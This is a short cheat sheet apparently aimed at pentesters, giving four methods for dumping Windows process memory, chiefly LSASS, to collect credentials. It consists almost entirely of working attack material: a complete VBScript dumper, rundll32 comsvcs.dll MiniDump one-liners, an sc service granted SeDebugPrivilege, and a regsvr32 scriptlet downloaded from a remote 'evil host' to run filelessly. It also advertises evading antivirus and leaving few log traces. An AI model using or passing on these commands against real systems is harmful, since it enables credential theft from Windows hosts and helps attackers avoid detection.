Windows Memory Dump Cheatsheet
Procdump is painful as most AV software now catches it.
The below cheat-sheet can be useful during memory forensics or pentests!
Method#1 — Using CSCRIPT
Since neither rundll32 nor comsvcs!MiniDumpW will enable the debugging privilege required to access lsass.exe, the following VBscript will work in an elevated process.
Option ExplicitConst SW_HIDE = 0If (WScript.Arguments.Count <> 1) Then
WScript.StdOut.WriteLine("procdump - Copyright (c) 2019 odzhan")
WScript.StdOut.WriteLine("Usage: procdump <process>")
WScript.Quit
Else
Dim fso, svc, list, proc, startup, cfg, pid, str, cmd, query, dmp
' get process id or name
pid = WScript.Arguments(0)
' connect with debug privilege
Set fso = CreateObject("Scripting.FileSystemObject")
Set svc = GetObject("WINMGMTS:{impersonationLevel=impersonate, (Debug)}")
' if not a number
If(Not IsNumeric(pid)) Then
query = "Name"
Else
query = "ProcessId"
End If
' try find it
Set list = svc.ExecQuery("SELECT * From Win32_Process Where " & _
query & " = '" & pid & "'")
If (list.Count = 0) Then
WScript.StdOut.WriteLine("Can't find active process : " & pid)
WScript.Quit()
End If For Each proc in list
pid = proc.ProcessId
str = proc.Name
Exit For
Next dmp = fso.GetBaseName(str) & ".bin"
' if dump file already exists, try to remove it
If(fso.FileExists(dmp)) Then
WScript.StdOut.WriteLine("Removing " & dmp)
fso.DeleteFile(dmp)
End If
WScript.StdOut.WriteLine("Attempting to dump memory from " & _
str & ":" & pid & " to " & dmp)
Set proc = svc.Get("Win32_Process")
Set startup = svc.Get("Win32_ProcessStartup")
Set cfg = startup.SpawnInstance_
cfg.ShowWindow = SW_HIDE cmd = "rundll32 C:\windows\system32\comsvcs.dll, MiniDump " & _
pid & " " & fso.GetAbsolutePathName(".") & "\" & _
dmp & " full"
Call proc.Create (cmd, null, cfg, pid)
' sleep for a second
Wscript.Sleep(1000)
If(fso.FileExists(dmp)) Then
WScript.StdOut.WriteLine("Memory saved to " & dmp)
Else
WScript.StdOut.WriteLine("Something went wrong.")
End If
End If
Run from elevated cmd prompt.
Most EDR will still not allow to do this
Method#2 — Using Powershell or CMD
Powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] dump.bin fullBypasses some common antiviruses such as Sophos Antivirus, KAV etc.
Method #3 — Using SC
Administrative users can use the Windows Service Control to create a service that runs our command, assign debug privileges to that service, and then run it. The following commands can be run from an elevated command prompt to create a MiniDump of LSASS:
- sc create test binpath=”rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] dump.bin full”
- sc privs test SeDebugPrivilege
- sc start test
Method #4 — Using regsvr32
The sct script to be hosted on your evil host.
Remember to change the <procid>
<?XML version=”1.0"?>
<scriptlet>
<registration
progid=”Pentest”
classid=”{F0001111–0000–0000–0000–0000FEEDACDC}” >
<script language=”JScript”>
<![CDATA[
var r = new ActiveXObject(“WScript.Shell”).Run(“cmd /k Powershell -c rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump <procid> lsadump.bin full”);
]]>
</script>
</registration>
</scriptlet>This could go totally fileless by applying /i as a URL leaving little traces. Windows event viewer would just indicate wscript.exe was executed.
regsvr32 /s /n /u /i:http://192.168.200.200/dumper.sct scrobj.dll
